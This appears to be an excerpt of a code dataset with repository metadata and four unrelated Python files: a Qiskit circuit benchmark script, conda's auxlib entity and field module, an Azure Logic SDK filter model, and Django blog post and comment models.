hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4c35bb436b9ed6741e7fba7e084c65f45d41b764
| 2,585
|
py
|
Python
|
data/p4VQE/R4/benchmark/startQiskit_Class724.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R4/benchmark/startQiskit_Class724.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R4/benchmark/startQiskit_Class724.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=3
# total number=15
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.cx(input_qubit[0],input_qubit[2]) # number=12
prog.x(input_qubit[2]) # number=13
prog.cx(input_qubit[0],input_qubit[2]) # number=14
prog.y(input_qubit[3]) # number=5
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.swap(input_qubit[1],input_qubit[0]) # number=7
prog.h(input_qubit[1]) # number=11
prog.swap(input_qubit[1],input_qubit[0]) # number=8
prog.y(input_qubit[0]) # number=9
prog.y(input_qubit[0]) # number=10
# circuit end
return prog
if __name__ == '__main__':
n = 4
V = np.arange(0, n, 1)
E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]
G = nx.Graph()
G.add_nodes_from(V)
G.add_weighted_edges_from(E)
step_size = 0.1
a_gamma = np.arange(0, np.pi, step_size)
a_beta = np.arange(0, np.pi, step_size)
a_gamma, a_beta = np.meshgrid(a_gamma, a_beta)
F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2 - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (
1 + np.cos(4 * a_gamma) ** 2)
result = np.where(F1 == np.amax(F1))
a = list(zip(result[0], result[1]))[0]
gamma = a[0] * step_size
beta = a[1] * step_size
prog = make_circuit(4)
sample_shot =5600
writefile = open("../data/startQiskit_Class724.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
backend = BasicAer.get_backend('statevector_simulator')
circuit1 = transpile(prog, FakeYorktown())
prog = circuit1
info = execute(prog,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 28.097826
| 118
| 0.637524
|
970f6dc0b40c55eebf94bbe221246c99b56d495d
| 33,381
|
py
|
Python
|
conda/_vendor/auxlib/entity.py
|
peschue/conda
|
dc25e8c8765c5dfd1f99d697617bc6148224e194
|
[
"BSD-3-Clause"
] | 1
|
2018-12-21T22:11:55.000Z
|
2018-12-21T22:11:55.000Z
|
conda/_vendor/auxlib/entity.py
|
peschue/conda
|
dc25e8c8765c5dfd1f99d697617bc6148224e194
|
[
"BSD-3-Clause"
] | null | null | null |
conda/_vendor/auxlib/entity.py
|
peschue/conda
|
dc25e8c8765c5dfd1f99d697617bc6148224e194
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
This module provides serializable, validatable, type-enforcing domain objects and data
transfer objects. It has many of the same motivations as the python
`Marshmallow <http://marshmallow.readthedocs.org/en/latest/why.html>`_ package. It is most
similar to `Schematics <http://schematics.readthedocs.io/>`_.
========
Tutorial
========
Chapter 1: Entity and Field Basics
----------------------------------
>>> class Color(Enum):
... blue = 0
... black = 1
... red = 2
>>> class Car(Entity):
... weight = NumberField(required=False)
... wheels = IntField(default=4, validation=lambda x: 3 <= x <= 4)
... color = EnumField(Color)
>>> # create a new car object
>>> car = Car(color=Color.blue, weight=4242.46)
>>> car
Car(weight=4242.46, color=0)
>>> # it has 4 wheels, all by default
>>> car.wheels
4
>>> # but a car can't have 5 wheels!
>>> # the `validation=` field is a simple callable that returns a
>>> # boolean based on validity
>>> car.wheels = 5
Traceback (most recent call last):
ValidationError: Invalid value 5 for wheels
>>> # we can call .dump() on car, and just get back a standard
>>> # python dict actually, it's an ordereddict to match attribute
>>> # declaration order
>>> type(car.dump())
<class '...OrderedDict'>
>>> car.dump()
OrderedDict([('weight', 4242.46), ('wheels', 4), ('color', 0)])
>>> # and json too (note the order!)
>>> car.json()
'{"weight": 4242.46, "wheels": 4, "color": 0}'
>>> # green cars aren't allowed
>>> car.color = "green"
Traceback (most recent call last):
ValidationError: 'green' is not a valid Color
>>> # but black cars are!
>>> car.color = "black"
>>> car.color
<Color.black: 1>
>>> # car.color really is an enum, promise
>>> type(car.color)
<enum 'Color'>
>>> # enum assignment can be with any of (and preferentially)
>>> # (1) an enum literal,
>>> # (2) a valid enum value, or
>>> # (3) a valid enum name
>>> car.color = Color.blue; car.color.value
0
>>> car.color = 1; car.color.name
'black'
>>> # let's do a round-trip marshalling of this thing
>>> same_car = Car.from_json(car.json()) # or equally Car.from_json(json.dumps(car.dump()))
>>> same_car == car
True
>>> # actually, they're two different instances
>>> same_car is not car
True
>>> # this works too
>>> cloned_car = Car(**car.dump())
>>> cloned_car == car
True
>>> # while we're at it, these are all equivalent too
>>> car == Car.from_objects(car)
True
>>> car == Car.from_objects({"weight": 4242.46, "wheels": 4, "color": 1})
True
>>> car == Car.from_json('{"weight": 4242.46, "color": 1}')
True
>>> # .from_objects() even lets you stack and combine objects
>>> class DumbClass:
... color = 0
... wheels = 3
>>> Car.from_objects(DumbClass(), dict(weight=2222, color=1))
Car(weight=2222, wheels=3, color=0)
>>> # and also pass kwargs that override properties pulled
>>> # off any objects
>>> Car.from_objects(DumbClass(), {'weight': 2222, 'color': 1}, color=2, weight=33)
Car(weight=33, wheels=3, color=2)
Chapter 2: Entity and Field Composition
---------------------------------------
>>> # now let's get fancy
>>> # a ComposableField "nests" another valid Entity
>>> # a ListField's first argument is a "generic" type,
>>> # which can be a valid Entity, any python primitive
>>> # type, or a list of Entities/types
>>> class Fleet(Entity):
... boss_car = ComposableField(Car)
... cars = ListField(Car)
>>> # here's our fleet of company cars
>>> company_fleet = Fleet(boss_car=Car(color='red'), cars=[car, same_car, cloned_car])
>>> company_fleet.pretty_json() #doctest: +SKIP
{
"boss_car": {
"wheels": 4
"color": 2,
},
"cars": [
{
"weight": 4242.46,
"wheels": 4
"color": 1,
},
{
"weight": 4242.46,
"wheels": 4
"color": 1,
},
{
"weight": 4242.46,
"wheels": 4
"color": 1,
}
]
}
>>> # the boss' car is red of course (and it's still an Enum)
>>> company_fleet.boss_car.color.name
'red'
>>> # and there are three cars left for the employees
>>> len(company_fleet.cars)
3
Chapter 3: Immutability
-----------------------
>>> class ImmutableCar(ImmutableEntity):
... wheels = IntField(default=4, validation=lambda x: 3 <= x <= 4)
... color = EnumField(Color)
>>> icar = ImmutableCar.from_objects({'wheels': 3, 'color': 'blue'})
>>> icar
ImmutableCar(wheels=3, color=0)
>>> icar.wheels = 4
Traceback (most recent call last):
AttributeError: Assignment not allowed. ImmutableCar is immutable.
>>> class FixedWheelCar(Entity):
... wheels = IntField(default=4, immutable=True)
... color = EnumField(Color)
>>> fwcar = FixedWheelCar.from_objects(icar)
>>> fwcar.json()
'{"wheels": 3, "color": 0}'
>>> # repainting the car is easy
>>> fwcar.color = Color.red
>>> fwcar.color.name
'red'
>>> # can't really change the number of wheels though
>>> fwcar.wheels = 18
Traceback (most recent call last):
AttributeError: The wheels field is immutable.
Chapter X: The del and null Weeds
---------------------------------
>>> old_date = lambda: isoparse('1982-02-17')
>>> class CarBattery(Entity):
... # NOTE: default value can be a callable!
... first_charge = DateField(required=False) # default=None, nullable=False
... latest_charge = DateField(default=old_date, nullable=True) # required=True
... expiration = DateField(default=old_date, required=False, nullable=False)
>>> # starting point
>>> battery = CarBattery()
>>> battery
CarBattery()
>>> battery.json()
'{"latest_charge": "1982-02-17T00:00:00", "expiration": "1982-02-17T00:00:00"}'
>>> # first_charge is not assigned a default value. Once one is assigned, it can be deleted,
>>> # but it can't be made null.
>>> battery.first_charge = isoparse('2016-03-23')
>>> battery
CarBattery(first_charge=datetime.datetime(2016, 3, 23, 0, 0))
>>> battery.first_charge = None
Traceback (most recent call last):
ValidationError: Value for first_charge not given or invalid.
>>> del battery.first_charge
>>> battery
CarBattery()
>>> # latest_charge can be null, but it can't be deleted. The default value is a callable.
>>> del battery.latest_charge
Traceback (most recent call last):
AttributeError: The latest_charge field is required and cannot be deleted.
>>> battery.latest_charge = None
>>> battery.json()
'{"latest_charge": null, "expiration": "1982-02-17T00:00:00"}'
>>> # expiration is assigned by default, can't be made null, but can be deleted.
>>> battery.expiration
datetime.datetime(1982, 2, 17, 0, 0)
>>> battery.expiration = None
Traceback (most recent call last):
ValidationError: Value for expiration not given or invalid.
>>> del battery.expiration
>>> battery.json()
'{"latest_charge": null}'
"""
from __future__ import absolute_import, division, print_function
from collections import Mapping, Sequence
from datetime import datetime
from functools import reduce
from json import JSONEncoder, dumps as json_dumps, loads as json_loads
from logging import getLogger
from enum import Enum
from . import NULL
from ._vendor.boltons.timeutils import isoparse
from .collection import AttrDict, frozendict, make_immutable
from .compat import (integer_types, isiterable, iteritems, itervalues, odict, string_types,
text_type, with_metaclass)
from .exceptions import Raise, ValidationError
from .ish import find_or_raise
from .logz import DumpEncoder
from .type_coercion import maybecall
log = getLogger(__name__)
__all__ = [
"Entity", "ImmutableEntity", "Field",
"BooleanField", "BoolField", "IntegerField", "IntField",
"NumberField", "StringField", "DateField",
"EnumField", "ListField", "MapField", "ComposableField",
]
KEY_OVERRIDES_MAP = "__key_overrides__"
NOTES = """
Current deficiencies to schematics:
- no get_mock_object method
- no context-dependent serialization or MultilingualStringType
- name = StringType(serialized_name='person_name', alternate_names=['human_name'])
- name = StringType(serialize_when_none=False)
- more flexible validation error messages
- field validation can depend on other fields
- 'roles' containing blacklists for .dump() and .json()
__roles__ = {
EntityRole.registered_name: Blacklist('field1', 'field2'),
EntityRole.another_registered_name: Whitelist('field3', 'field4'),
}
TODO:
- alternate field names
- add dump_if_null field option
- add help/description parameter to Field
- consider leveraging slots
- collect all validation errors before raising
- Allow returning string error message for validation instead of False
- profile and optimize
- use boltons instead of dateutil
- correctly implement copy and deepcopy on fields and Entity, DictSafeMixin
http://stackoverflow.com/questions/1500718/what-is-the-right-way-to-override-the-copy-deepcopy-operations-on-an-object-in-p
Optional Field Properties:
- validation = None
- default = None
- required = True
- in_dump = True
- nullable = False
Behaviors:
- Nullable is a "hard" setting, in that the value is either always or never allowed to be None.
- What happens then if required=False and nullable=False?
- The object can be init'd without a value (though not with a None value).
getattr throws AttributeError
- Any assignment must be not None.
- Setting a value to None doesn't "unset" a value. (That's what del is for.) And you can't
del a value if required=True, nullable=False, default=None.
- If a field is not required, del does *not* "unmask" the default value. Instead, del
removes the value from the object entirely. To get back the default value, need to recreate
the object. Entity.from_objects(old_object)
- Disabling in_dump is a "hard" setting, in that with it disabled the field will never get
dumped. With it enabled, the field may or may not be dumped depending on its value and other
settings.
- Required is a "hard" setting, in that if True, a valid value or default must be provided. None
is only a valid value or default if nullable is True.
- In general, nullable means that None is a valid value.
- getattr returns None instead of raising Attribute error
- If in_dump, field is given with null value.
- If default is not None, assigning None clears a previous assignment. Future getattrs return
the default value.
- What does nullable mean with default=None and required=True? Does instantiation raise
an error if assignment not made on init? Can IntField(nullable=True) be init'd?
- If required=False and nullable=False, field will only be in dump if field!=None.
Also, getattr raises AttributeError.
- If required=False and nullable=True, field will be in dump if field==None.
- If in_dump is True, does default value get dumped:
- if no assignment, default exists
- if nullable, and assigned None
- How does optional validation work with nullable and assigning None?
- When does gettattr throw AttributeError, and when does it return None?
"""
class Field(object):
"""
Fields are doing something very similar to boxing and unboxing
of c#/java primitives. __set__ should take a "primitive" or "raw" value and create a "boxed"
or "programatically useable" value of it. While __get__ should return the boxed value,
dump in turn should unbox the value into a primitive or raw value.
Arguments:
types_ (primitive literal or type or sequence of types):
default (any, callable, optional): If default is callable, it's guaranteed to return a
valid value at the time of Entity creation.
required (boolean, optional):
validation (callable, optional):
dump (boolean, optional):
"""
# Used to track order of field declarations. Supporting python 2.7, so can't rely
# on __prepare__. Strategy lifted from http://stackoverflow.com/a/4460034/2127762
_order_helper = 0
def __init__(self, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=False, aliases=()):
self._required = required
self._validation = validation
self._in_dump = in_dump
self._default_in_dump = default_in_dump
self._nullable = nullable
self._immutable = immutable
self._aliases = aliases
if default is NULL:
self._default = NULL
else:
self._default = default if callable(default) else self.box(None, None, default)
self.validate(None, self.box(None, None, maybecall(default)))
self._order_helper = Field._order_helper
Field._order_helper += 1
@property
def name(self):
try:
return self._name
except AttributeError:
log.error("The name attribute has not been set for this field. "
"Call set_name at class creation time.")
raise
def set_name(self, name):
self._name = name
return self
def __get__(self, instance, instance_type):
try:
if instance is None: # if calling from the class object
val = getattr(instance_type, KEY_OVERRIDES_MAP)[self.name]
else:
val = instance.__dict__[self.name]
except AttributeError:
log.error("The name attribute has not been set for this field.")
raise AttributeError("The name attribute has not been set for this field.")
except KeyError:
if self.default is NULL:
raise AttributeError("A value for {0} has not been set".format(self.name))
else:
val = maybecall(self.default) # default *can* be a callable
if val is None and not self.nullable:
# means the "tricky edge case" was activated in __delete__
raise AttributeError("The {0} field has been deleted.".format(self.name))
return self.unbox(instance, instance_type, val)
def __set__(self, instance, val):
if self.immutable and instance._initd:
raise AttributeError("The {0} field is immutable.".format(self.name))
# validate will raise an exception if invalid
# validate will return False if the value should be removed
instance.__dict__[self.name] = self.validate(instance, self.box(instance, instance.__class__, val))
def __delete__(self, instance):
if self.immutable and instance._initd:
raise AttributeError("The {0} field is immutable.".format(self.name))
elif self.required:
raise AttributeError("The {0} field is required and cannot be deleted."
.format(self.name))
elif not self.nullable:
# tricky edge case
# given a field Field(default='some value', required=False, nullable=False)
# works together with Entity.dump() logic for selecting fields to include in dump
# `if value is not None or field.nullable`
instance.__dict__[self.name] = None
else:
instance.__dict__.pop(self.name, None)
def box(self, instance, instance_type, val):
return val
def unbox(self, instance, instance_type, val):
return val
def dump(self, instance, instance_type, val):
return val
def validate(self, instance, val):
"""
Returns:
True: if val is valid
Raises:
ValidationError
"""
# note here calling, but not assigning; could lead to unexpected behavior
if isinstance(val, self._type) and (self._validation is None or self._validation(val)):
return val
elif val is NULL and not self.required:
return val
elif val is None and self.nullable:
return val
else:
raise ValidationError(getattr(self, 'name', 'undefined name'), val)
@property
def required(self):
return self._required
@property
def type(self):
return self._type
@property
def default(self):
return self._default
@property
def in_dump(self):
return self._in_dump
@property
def default_in_dump(self):
return self._default_in_dump
@property
def nullable(self):
return self.is_nullable
@property
def is_nullable(self):
return self._nullable
@property
def immutable(self):
return self._immutable
class BooleanField(Field):
_type = bool
def box(self, instance, instance_type, val):
return None if val is None else bool(val)
BoolField = BooleanField
class IntegerField(Field):
_type = integer_types
IntField = IntegerField
class NumberField(Field):
_type = integer_types + (float, complex)
class StringField(Field):
_type = string_types
def box(self, instance, instance_type, val):
return text_type(val) if isinstance(val, NumberField._type) else val
class DateField(Field):
_type = datetime
def box(self, instance, instance_type, val):
try:
return isoparse(val) if isinstance(val, string_types) else val
except ValueError as e:
raise ValidationError(val, msg=e)
def dump(self, instance, instance_type, val):
return None if val is None else val.isoformat()
class EnumField(Field):
def __init__(self, enum_class, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=False, aliases=()):
if not issubclass(enum_class, Enum):
raise ValidationError(None, msg="enum_class must be an instance of Enum")
self._type = enum_class
super(EnumField, self).__init__(default, required, validation,
in_dump, default_in_dump, nullable, immutable, aliases)
def box(self, instance, instance_type, val):
if val is None:
# let the required/nullable logic handle validation for this case
return None
try:
# try to box using val as an Enum name
return self._type(val)
except ValueError as e1:
try:
# try to box using val as an Enum value
return self._type[val]
except KeyError:
raise ValidationError(val, msg=e1)
def dump(self, instance, instance_type, val):
return None if val in (None, NULL) else val.value
class ListField(Field):
_type = tuple
def __init__(self, element_type, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=False, aliases=()):
self._element_type = element_type
super(ListField, self).__init__(default, required, validation,
in_dump, default_in_dump, nullable, immutable, aliases)
def box(self, instance, instance_type, val):
if val is None:
return None
elif isinstance(val, string_types):
raise ValidationError("Attempted to assign a string to ListField {0}"
"".format(self.name))
elif isiterable(val):
et = self._element_type
if isinstance(et, type) and issubclass(et, Entity):
return self._type(v if isinstance(v, et) else et(**v) for v in val)
else:
return make_immutable(val) if self.immutable else self._type(val)
else:
raise ValidationError(val, msg="Cannot assign a non-iterable value to "
"{0}".format(self.name))
def unbox(self, instance, instance_type, val):
return self._type() if val is None and not self.nullable else val
def dump(self, instance, instance_type, val):
if isinstance(self._element_type, type) and issubclass(self._element_type, Entity):
return self._type(v.dump() for v in val)
else:
return val
def validate(self, instance, val):
val = super(ListField, self).validate(instance, val)
if val:
et = self._element_type
self._type(Raise(ValidationError(self.name, el, et)) for el in val
if not isinstance(el, et))
return val
class MutableListField(ListField):
_type = list
class MapField(Field):
_type = frozendict
def __init__(self, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=True, aliases=()):
super(MapField, self).__init__(default, required, validation, in_dump, default_in_dump,
nullable, immutable, aliases)
def box(self, instance, instance_type, val):
# TODO: really need to make this recursive to make any lists or maps immutable
if val is None:
return self._type()
elif isiterable(val):
val = make_immutable(val)
if not isinstance(val, Mapping):
raise ValidationError(val, msg="Cannot assign a non-iterable value to "
"{0}".format(self.name))
return val
else:
raise ValidationError(val, msg="Cannot assign a non-iterable value to "
"{0}".format(self.name))
class ComposableField(Field):
def __init__(self, field_class, default=NULL, required=True, validation=None,
in_dump=True, default_in_dump=True, nullable=False, immutable=False, aliases=()):
self._type = field_class
super(ComposableField, self).__init__(default, required, validation,
in_dump, default_in_dump, nullable, immutable,
aliases)
def box(self, instance, instance_type, val):
if val is None:
return None
if isinstance(val, self._type):
return val
else:
# assuming val is a dict now
try:
# if there is a key named 'self', have to rename it
if hasattr(val, 'pop'):
val['slf'] = val.pop('self')
except KeyError:
pass # no key of 'self', so no worries
if isinstance(val, self._type):
return val if isinstance(val, self._type) else self._type(**val)
elif isinstance(val, Mapping):
return self._type(**val)
elif isinstance(val, Sequence) and not isinstance(val, string_types):
return self._type(*val)
else:
return self._type(val)
def dump(self, instance, instance_type, val):
return None if val is None else val.dump()
class EntityType(type):
@staticmethod
def __get_entity_subclasses(bases):
try:
return [base for base in bases if issubclass(base, Entity) and base is not Entity]
except NameError:
# NameError: global name 'Entity' is not defined
return ()
def __new__(mcs, name, bases, dct):
# if we're about to mask a field that's already been created with something that's
# not a field, then assign it to an alternate variable name
non_field_keys = (key for key, value in iteritems(dct)
if not isinstance(value, Field) and not key.startswith('__'))
entity_subclasses = EntityType.__get_entity_subclasses(bases)
if entity_subclasses:
keys_to_override = [key for key in non_field_keys
if any(isinstance(base.__dict__.get(key), Field)
for base in entity_subclasses)]
dct[KEY_OVERRIDES_MAP] = dict((key, dct.pop(key)) for key in keys_to_override)
else:
dct[KEY_OVERRIDES_MAP] = dict()
return super(EntityType, mcs).__new__(mcs, name, bases, dct)
def __init__(cls, name, bases, attr):
super(EntityType, cls).__init__(name, bases, attr)
fields = odict()
_field_sort_key = lambda x: x[1]._order_helper
for clz in reversed(type.mro(cls)):
clz_fields = ((name, field.set_name(name))
for name, field in iteritems(clz.__dict__)
if isinstance(field, Field))
fields.update(sorted(clz_fields, key=_field_sort_key))
cls.__fields__ = frozendict(fields)
if hasattr(cls, '__register__'):
cls.__register__()
def __call__(cls, *args, **kwargs):
instance = super(EntityType, cls).__call__(*args, **kwargs)
setattr(instance, '_{0}__initd'.format(cls.__name__), True)
return instance
@property
def fields(cls):
return cls.__fields__.keys()
@with_metaclass(EntityType)
class Entity(object):
__fields__ = odict()
_lazy_validate = False
def __init__(self, **kwargs):
for key, field in iteritems(self.__fields__):
try:
setattr(self, key, kwargs[key])
except KeyError:
alias = next((ls for ls in field._aliases if ls in kwargs), None)
if alias is not None:
setattr(self, key, kwargs[alias])
elif key in getattr(self, KEY_OVERRIDES_MAP):
# handle the case of fields inherited from subclass but overrode on class object
setattr(self, key, getattr(self, KEY_OVERRIDES_MAP)[key])
elif field.required and field.default is NULL:
raise ValidationError(key, msg="{0} requires a {1} field. Instantiated with "
"{2}".format(self.__class__.__name__,
key, kwargs))
except ValidationError:
if kwargs[key] is not None or field.required:
raise
if not self._lazy_validate:
self.validate()
@classmethod
def from_objects(cls, *objects, **override_fields):
init_vars = dict()
search_maps = tuple(AttrDict(o) if isinstance(o, dict) else o
for o in ((override_fields,) + objects))
for key, field in iteritems(cls.__fields__):
try:
init_vars[key] = find_or_raise(key, search_maps, field._aliases)
except AttributeError:
pass
return cls(**init_vars)
@classmethod
def from_json(cls, json_str):
return cls(**json_loads(json_str))
@classmethod
def load(cls, data_dict):
return cls(**data_dict)
def validate(self):
# TODO: here, validate should only have to determine if the required keys are set
try:
reduce(lambda _, name: getattr(self, name),
(name for name, field in iteritems(self.__fields__) if field.required)
)
except TypeError as e:
if str(e) == "reduce() of empty sequence with no initial value":
pass
except AttributeError as e:
raise ValidationError(None, msg=e)
def __repr__(self):
def _valid(key):
# TODO: re-enable once aliases are implemented
# if key.startswith('_'):
# return False
if '__' in key:
return False
try:
getattr(self, key)
return True
except AttributeError:
return False
def _val(key):
val = getattr(self, key)
return repr(val.value) if isinstance(val, Enum) else repr(val)
def _sort_helper(key):
field = self.__fields__.get(key)
return field._order_helper if field is not None else -1
kwarg_str = ", ".join("{0}={1}".format(key, _val(key))
for key in sorted(self.__dict__, key=_sort_helper)
if _valid(key))
return "{0}({1})".format(self.__class__.__name__, kwarg_str)
@classmethod
def __register__(cls):
pass
def json(self, indent=None, separators=None, **kwargs):
return json_dumps(self, indent=indent, separators=separators, cls=DumpEncoder, **kwargs)
def pretty_json(self, indent=2, separators=(',', ': '), **kwargs):
return self.json(indent=indent, separators=separators, **kwargs)
def dump(self):
return odict((field.name, field.dump(self, self.__class__, value))
for field, value in ((field, getattr(self, field.name, NULL))
for field in self.__dump_fields())
if value is not NULL and not (value is field.default
and not field.default_in_dump))
@classmethod
def __dump_fields(cls):
if '__dump_fields_cache' not in cls.__dict__:
cls.__dump_fields_cache = tuple(field for field in itervalues(cls.__fields__)
if field.in_dump)
return cls.__dump_fields_cache
def __eq__(self, other):
if self.__class__ != other.__class__:
return False
rando_default = 19274656290 # need an arbitrary but definite value if field does not exist
return all(getattr(self, field, rando_default) == getattr(other, field, rando_default)
for field in self.__fields__)
def __hash__(self):
return sum(hash(getattr(self, field, None)) for field in self.__fields__)
@property
def _initd(self):
return getattr(self, '_{0}__initd'.format(self.__class__.__name__), None)
class ImmutableEntity(Entity):
def __setattr__(self, attribute, value):
if self._initd:
raise AttributeError("Assignment not allowed. {0} is immutable."
.format(self.__class__.__name__))
super(ImmutableEntity, self).__setattr__(attribute, value)
def __delattr__(self, item):
if self._initd:
raise AttributeError("Deletion not allowed. {0} is immutable."
.format(self.__class__.__name__))
super(ImmutableEntity, self).__delattr__(item)
class DictSafeMixin(object):
def __getitem__(self, item):
return getattr(self, item)
def __setitem__(self, key, value):
setattr(self, key, value)
def __delitem__(self, key):
delattr(self, key)
def get(self, item, default=None):
return getattr(self, item, default)
def __contains__(self, item):
value = getattr(self, item, None)
if value is None:
return False
field = self.__fields__[item]
if isinstance(field, (MapField, ListField)):
return len(value) > 0
return True
def __iter__(self):
for key in self.__fields__:
if key in self:
yield key
def iteritems(self):
for key in self.__fields__:
if key in self:
yield key, getattr(self, key)
def items(self):
return self.iteritems()
def copy(self):
return self.__class__(**self.dump())
def setdefault(self, key, default_value):
if key not in self:
setattr(self, key, default_value)
def update(self, E=None, **F):
# D.update([E, ]**F) -> None. Update D from dict/iterable E and F.
# If E present and has a .keys() method, does: for k in E: D[k] = E[k]
# If E present and lacks .keys() method, does: for (k, v) in E: D[k] = v
# In either case, this is followed by: for k in F: D[k] = F[k]
if E is not None:
if hasattr(E, 'keys'):
for k in E:
self[k] = E[k]
else:
for k, v in iteritems(E):
self[k] = v
for k in F:
self[k] = F[k]
class EntityEncoder(JSONEncoder):
# json.dumps(obj, cls=SetEncoder)
def default(self, obj):
if hasattr(obj, 'dump'):
return obj.dump()
elif hasattr(obj, '__json__'):
return obj.__json__()
elif hasattr(obj, 'to_json'):
return obj.to_json()
elif hasattr(obj, 'as_json'):
return obj.as_json()
elif isinstance(obj, Enum):
return obj.value
return JSONEncoder.default(self, obj)
| 35.473964
| 127
| 0.606093
|
7f20147bc657611bddd1459d20e2a6a5652b7655
| 1,243
|
py
|
Python
|
sdk/logic/azure-mgmt-logic/azure/mgmt/logic/models/integration_account_partner_filter.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 8
|
2021-01-13T23:44:08.000Z
|
2021-03-17T10:13:36.000Z
|
sdk/logic/azure-mgmt-logic/azure/mgmt/logic/models/integration_account_partner_filter.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 226
|
2019-07-24T07:57:21.000Z
|
2019-10-15T01:07:24.000Z
|
sdk/logic/azure-mgmt-logic/azure/mgmt/logic/models/integration_account_partner_filter.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 2
|
2020-05-21T22:51:22.000Z
|
2020-05-26T20:53:01.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class IntegrationAccountPartnerFilter(Model):
"""The integration account partner filter for odata query.
All required parameters must be populated in order to send to Azure.
:param partner_type: Required. The partner type of integration account
partner. Possible values include: 'NotSpecified', 'B2B'
:type partner_type: str or ~azure.mgmt.logic.models.PartnerType
"""
_validation = {
'partner_type': {'required': True},
}
_attribute_map = {
'partner_type': {'key': 'partnerType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(IntegrationAccountPartnerFilter, self).__init__(**kwargs)
self.partner_type = kwargs.get('partner_type', None)
| 34.527778
| 76
| 0.624296
|
d274aac19ed2bf05afb93a894e04a54ae1e0995f
| 495
|
py
|
Python
|
django_rest_framework/posts_app/models.py
|
KushalVenkatesh/drf-secure-apis-demo
|
ef24928f9ad58e205827ce93ab3be3d1e80af715
|
[
"Apache-2.0"
] | 1
|
2021-08-31T06:09:00.000Z
|
2021-08-31T06:09:00.000Z
|
django_rest_framework/posts_app/models.py
|
KushalVenkatesh/drf-secure-apis-demo
|
ef24928f9ad58e205827ce93ab3be3d1e80af715
|
[
"Apache-2.0"
] | null | null | null |
django_rest_framework/posts_app/models.py
|
KushalVenkatesh/drf-secure-apis-demo
|
ef24928f9ad58e205827ce93ab3be3d1e80af715
|
[
"Apache-2.0"
] | 1
|
2021-08-31T06:08:59.000Z
|
2021-08-31T06:08:59.000Z
|
from django.db import models
# Create your models here.
class Post(models.Model):
title = models.CharField(max_length=150)
description = models.CharField(max_length=1000)
author = models.CharField(max_length=150)
created_at = models.IntegerField()
votes = models.IntegerField()
class Comment(models.Model):
comment_author = models.CharField(max_length=150)
post = models.ForeignKey(Post, on_delete=models.CASCADE)
comment = models.CharField(max_length=1000)
| 27.5
| 60
| 0.745455
|
